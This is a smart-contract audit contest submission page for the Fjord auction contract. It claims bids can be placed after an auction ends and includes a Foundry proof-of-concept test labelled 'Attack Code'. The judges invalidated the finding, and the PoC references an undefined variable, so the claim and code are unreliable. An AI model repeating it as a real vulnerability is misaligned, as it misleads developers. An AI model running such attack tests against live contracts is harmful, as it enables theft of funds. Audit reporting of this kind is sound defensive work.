Fjord Token Staking

Fjord

DeFiFoundry

20,000 USDC

View results

Previous Next

Submission Details

Severity: high

Invalid

Malicious user can cause lack of liquidity in auctions

oxlade

Summary

An attacker can exploit the auction contract by ending the auction and then placing additional bids, preventing honest bidders from claiming tokens and leading to a lack of liquidity. This vulnerability allows attackers to manipulate the auction outcome and steal tokens meant for honest bidders.

Vulnerability Details

AFFECTED CONTRACT FILE :

2024-08-fjord/src/FjordAuction.sol at main · Cyfrin/2024-08-fjord (github.com)

The bid() function allows bids to be placed after the auction has ended.

Affected Function:

function bid(uint256 amount) external {
bids[msg.sender] = bids[msg.sender].add(amount);
totalBids = totalBids.add(amount);
fjordPoints.transferFrom(msg.sender, address(this), amount);
emit BidAdded(msg.sender, amount);
}

Root Cause:
The bid() function lacks a check to prevent bids after the auction end time (auctionEndTime).

Impact

lack of liquidity for honest bidders ---->>

The impact of this issue is that honest bidders will not receive their tokens or will experience delays in receiving them due to the lack of liquidity caused by late bids.

Tools Used

VS CODE

Recommendations

Update the bid() function to prevent bids after the auction has ended.

function bid(uint256 amount) external {
if (block.timestamp >= auctionEndTime) {
revert AuctionAlreadyEnded();
}
bids[msg.sender] = bids[msg.sender].add(amount);
totalBids = totalBids.add(amount);
fjordPoints.transferFrom(msg.sender, address(this), amount);
emit BidAdded(msg.sender, amount);
}

By adding the ended check, we ensure that bids cannot be placed after the auction has been ended, either by calling auctionEnd() or by the auction end time being reached. This prevents malicious users from placing bids after the auction has ended, which would lead to a lack of liquidity for honest bidders.

**POC CODE WALKTHROUGH PROCESS TO REPRODUCE IT **

Attack Code:

Here is my POC Code from the Test file.

function testLackOfLiquidity() public {

address bidder = address(0x2);

address user = address(0xf);

uint256 bidAmount = 100 ether;

uint256 amount = 100 ether;

deal(address(fjordPoints), bidder, bidAmount);

deal(address(fjordPoints), user, amount);

vm.startPrank(bidder);

fjordPoints.approve(address(auction), bidAmount);

auction.bid(bidAmount);

vm.stopPrank();

skip(biddingTime);

vm.startPrank(user);

fjordPoints.approve(address(auction), attackAmount);

auction.auctionEnd();

auction.bid(attackAmount);

auction.claimTokens();

vm.stopPrank();

vm.prank(bidder);

auction.claimTokens();

}

This my POC shows how the auction contract that can be exploited by placing bids after the auction has ended, leading to a lack of liquidity for honest bidders.

Updates

Lead Judging Commences

inallhonesty Lead Judge about 1 year ago

Submission Judgement Published

Invalidated

Reason: Lack of quality

Prize pool breakdown

Total prize

20,000 USDC

nSLOC

662

30 USDC / LOC

High Medium

16,000 USDC

Low

2,500 USDC

Judges

1,500 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.